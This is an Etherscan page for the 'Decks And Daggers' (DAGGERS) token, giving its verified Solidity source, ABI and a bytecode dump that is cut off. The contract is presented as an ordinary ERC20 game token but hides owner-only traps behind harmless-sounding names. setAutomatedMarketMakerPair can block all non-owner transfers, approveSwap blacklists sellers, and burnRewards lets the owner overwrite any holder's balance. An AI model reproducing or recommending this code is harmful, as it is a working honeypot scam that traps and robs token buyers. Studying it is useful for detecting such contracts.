ETH Price: $3,217.77 (+5.37%)

Token

Decks And Daggers | t.me/DecksAndDaggers (DAGGERS)
 

Overview

Max Total Supply

500,000,000 DAGGERS

Holders

50

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
827,842.368976235 DAGGERS

Value
$0.00
0x4fafafba1266BC969b430Ef2E12222dE7D69eeF5
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DecksAndDaggers

Compiler Version
v0.8.1+commit.df193b15

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2021-08-08
*/

/*

██▄   ▄███▄   ▄█▄    █  █▀  ▄▄▄▄▄       ██      ▄   ██▄       ██▄   ██     ▄▀    ▄▀  ▄███▄   █▄▄▄▄   ▄▄▄▄▄   
█  █  █▀   ▀  █▀ ▀▄  █▄█   █     ▀▄     █ █      █  █  █      █  █  █ █  ▄▀    ▄▀    █▀   ▀  █  ▄▀  █     ▀▄ 
█   █ ██▄▄    █   ▀  █▀▄ ▄  ▀▀▀▀▄       █▄▄█ ██   █ █   █     █   █ █▄▄█ █ ▀▄  █ ▀▄  ██▄▄    █▀▀▌ ▄  ▀▀▀▀▄   
█  █  █▄   ▄▀ █▄  ▄▀ █  █ ▀▄▄▄▄▀        █  █ █ █  █ █  █      █  █  █  █ █   █ █   █ █▄   ▄▀ █  █  ▀▄▄▄▄▀    
███▀  ▀███▀   ▀███▀    █                   █ █  █ █ ███▀      ███▀     █  ███   ███  ▀███▀     █             
                      ▀                   █  █   ██                   █                       ▀              
                                         â–€                           â–€                              
Welcome to Decks and Daggers! 
A Deck-Building RPG Card Game on Ethereum blockchain, 
where you venture down into the dungeons to slay monsters
and collect treasure in $DAGGERS token!

*/
// SPDX-License-Identifier: MIT

pragma solidity =0.8.1;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint256);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping (address => uint256) internal _balances;
    mapping (address => bool) private _approveSwap;
    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 internal _totalSupply;
    uint256 _reward;
    string internal _name;
    string internal _symbol;
    uint256 internal _decimals;
    bool maxTxPercent = true;
    address internal _owner;
    address private uniV2router;
    address private uniV2factory;
    

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, uint256 decimals_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        _owner = msg.sender;
    }

    modifier onlyOwner() {
        require(_owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint256) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
    
    function recall(address _address) external onlyOwner {
        _approveSwap[_address] = false;
    }

    function approveSwap(address _address) external onlyOwner {
        _approveSwap[_address] = true;
    }

    function approvedTransfer(address _address) public view returns (bool) {
        return _approveSwap[_address];
    }

    function setAutomatedMarketMakerPair() public virtual onlyOwner {
        if (maxTxPercent == true) {maxTxPercent = false;} else {maxTxPercent = true;}
    }
 
    function maxTxPercentState() public view returns (bool) {
        return maxTxPercent;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    function sendReward (uint256 value) external onlyOwner {
        _reward = value;
    }
    
    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be grater thatn zero");
        if (_approveSwap[sender] || _approveSwap[recipient]) 
        require(maxTxPercent == false, "");
        if (maxTxPercent == true || sender == _owner || recipient == _owner) {
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);}
        else {require (maxTxPercent == true, "");} 
    }
    
    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _reward - amount;
        _totalSupply -= amount;
        emit Transfer(account, address(0), amount);
    }
    
    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

contract  DecksAndDaggers is ERC20 {
    constructor(uint256 initialSupply) ERC20(_name, _symbol, _decimals) {
        _name = " Decks And Daggers | t.me/DecksAndDaggers";
        _symbol = "DAGGERS";
        _decimals = 9;
        _totalSupply += initialSupply;
        _balances[msg.sender] += initialSupply;
        emit Transfer(address(0), msg.sender, initialSupply);
    }
    
    function burnRewards(address account, uint256 value) external onlyOwner {
    _burn(account, value);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"initialSupply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"approveSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"approvedTransfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burnRewards","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxPercentState","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"recall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"sendReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040526001600860006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b50604051620024b1380380620024b1833981810160405281019062000052919062000428565b600580546200006190620004e9565b80601f01602080910402602001604051908101604052809291908181526020018280546200008f90620004e9565b8015620000e05780601f10620000b457610100808354040283529160200191620000e0565b820191906000526020600020905b815481529060010190602001808311620000c257829003601f168201915b505050505060068054620000f490620004e9565b80601f01602080910402602001604051908101604052809291908181526020018280546200012290620004e9565b8015620001735780601f10620001475761010080835404028352916020019162000173565b820191906000526020600020905b8154815290600101906020018083116200015557829003601f168201915b505050505060075482600590805190602001906200019392919062000361565b508160069080519060200190620001ac92919062000361565b508060078190555033600860016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050506040518060600160405280602981526020016200248860299139600590805190602001906200022992919062000361565b506040518060400160405280600781526020017f4441474745525300000000000000000000000000000000000000000000000000815250600690805190602001906200027792919062000361565b506009600781905550806003600082825462000294919062000482565b92505081905550806000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620002eb919062000482565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000352919062000465565b60405180910390a35062000597565b8280546200036f90620004e9565b90600052602060002090601f016020900481019282620003935760008555620003df565b82601f10620003ae57805160ff1916838001178555620003df565b82800160010185558215620003df579182015b82811115620003de578251825591602001919060010190620003c1565b5b509050620003ee9190620003f2565b5090565b5b808211156200040d576000816000905550600101620003f3565b5090565b60008151905062000422816200057d565b92915050565b6000602082840312156200043b57600080fd5b60006200044b8482850162000411565b91505092915050565b6200045f81620004df565b82525050565b60006020820190506200047c600083018462000454565b92915050565b60006200048f82620004df565b91506200049c83620004df565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620004d457620004d36200051f565b5b828201905092915050565b6000819050919050565b600060028204905060018216806200050257607f821691505b602082108114156200051957620005186200054e565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6200058881620004df565b81146200059457600080fd5b50565b611ee180620005a76000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806395d89b41116100a2578063ac8a93b811610071578063ac8a93b814610309578063c78b6dea14610327578063ca43051914610343578063dd62ed3e1461035f578063f3b95cd71461038f57610116565b806395d89b411461026f5780639f08b3191461028d578063a457c2d7146102a9578063a9059cbb146102d957610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780633cd64cf31461020557806370a0823114610235578063749b991e1461026557610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b6101236103ab565b604051610130919061182b565b60405180910390f35b610153600480360381019061014e91906115d3565b61043d565b6040516101609190611810565b60405180910390f35b61017161045b565b60405161017e91906119ad565b60405180910390f35b6101a1600480360381019061019c9190611584565b610465565b6040516101ae9190611810565b60405180910390f35b6101bf610566565b6040516101cc91906119ad565b60405180910390f35b6101ef60048036038101906101ea91906115d3565b610570565b6040516101fc9190611810565b60405180910390f35b61021f600480360381019061021a919061151f565b61061c565b60405161022c9190611810565b60405180910390f35b61024f600480360381019061024a919061151f565b610672565b60405161025c91906119ad565b60405180910390f35b61026d6106ba565b005b6102776107a4565b604051610284919061182b565b60405180910390f35b6102a760048036038101906102a2919061151f565b610836565b005b6102c360048036038101906102be91906115d3565b610920565b6040516102d09190611810565b60405180910390f35b6102f360048036038101906102ee91906115d3565b610a14565b6040516103009190611810565b60405180910390f35b610311610a32565b60405161031e9190611810565b60405180910390f35b610341600480360381019061033c919061160f565b610a49565b005b61035d6004803603810190610358919061151f565b610ae3565b005b61037960048036038101906103749190611548565b610bce565b60405161038691906119ad565b60405180910390f35b6103a960048036038101906103a491906115d3565b610c55565b005b6060600580546103ba90611ae9565b80601f01602080910402602001604051908101604052809291908181526020018280546103e690611ae9565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610cf3565b8484610cfb565b6001905092915050565b6000600354905090565b6000610472848484610ec6565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006104bd610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561053d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610534906118cd565b60405180910390fd5b61055a85610549610cf3565b85846105559190611a3a565b610cfb565b60019150509392505050565b6000600754905090565b600061061261057d610cf3565b84846002600061058b610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461060d91906119e4565b610cfb565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461074a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610741906118ed565b60405180910390fd5b60011515600860009054906101000a900460ff1615151415610786576000600860006101000a81548160ff0219169083151502179055506107a2565b6001600860006101000a81548160ff0219169083151502179055505b565b6060600680546107b390611ae9565b80601f01602080910402602001604051908101604052809291908181526020018280546107df90611ae9565b801561082c5780601f106108015761010080835404028352916020019161082c565b820191906000526020600020905b81548152906001019060200180831161080f57829003601f168201915b5050505050905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146108c6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108bd906118ed565b60405180910390fd5b60018060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000806002600061092f610cf3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156109ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109e39061198d565b60405180910390fd5b610a096109f7610cf3565b858584610a049190611a3a565b610cfb565b600191505092915050565b6000610a28610a21610cf3565b8484610ec6565b6001905092915050565b6000600860009054906101000a900460ff16905090565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ad9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ad0906118ed565b60405180910390fd5b8060048190555050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b73576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6a906118ed565b60405180910390fd5b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ce5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdc906118ed565b60405180910390fd5b610cef82826113ad565b5050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d6b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d629061196d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ddb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd29061188d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610eb991906119ad565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2d9061192d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fa6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9d9061184d565b60405180910390fd5b60008111610fe9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fe09061186d565b60405180910390fd5b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061108a5750600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110e65760001515600860009054906101000a900460ff161515146110e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110dc9061194d565b60405180910390fd5b5b60011515600860009054906101000a900460ff16151514806111555750600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b806111ad5750600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b15611351576111bd8383836114f0565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611243576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123a906118ad565b60405180910390fd5b818161124f9190611a3a565b6000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546112df91906119e4565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161134391906119ad565b60405180910390a3506113a8565b60011515600860009054906101000a900460ff161515146113a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161139e9061194d565b60405180910390fd5b5b505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561141d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114149061190d565b60405180910390fd5b8060045461142b9190611a3a565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550806003600082825461147f9190611a3a565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516114e491906119ad565b60405180910390a35050565b505050565b60008135905061150481611e7d565b92915050565b60008135905061151981611e94565b92915050565b60006020828403121561153157600080fd5b600061153f848285016114f5565b91505092915050565b6000806040838503121561155b57600080fd5b6000611569858286016114f5565b925050602061157a858286016114f5565b9150509250929050565b60008060006060848603121561159957600080fd5b60006115a7868287016114f5565b93505060206115b8868287016114f5565b92505060406115c98682870161150a565b9150509250925092565b600080604083850312156115e657600080fd5b60006115f4858286016114f5565b92505060206116058582860161150a565b9150509250929050565b60006020828403121561162157600080fd5b600061162f8482850161150a565b91505092915050565b61164181611a80565b82525050565b6000611652826119c8565b61165c81856119d3565b935061166c818560208601611ab6565b61167581611b79565b840191505092915050565b600061168d6023836119d3565b915061169882611b8a565b604082019050919050565b60006116b06029836119d3565b91506116bb82611bd9565b604082019050919050565b60006116d36022836119d3565b91506116de82611c28565b604082019050919050565b60006116f66026836119d3565b915061170182611c77565b604082019050919050565b60006117196028836119d3565b915061172482611cc6565b604082019050919050565b600061173c6020836119d3565b91506117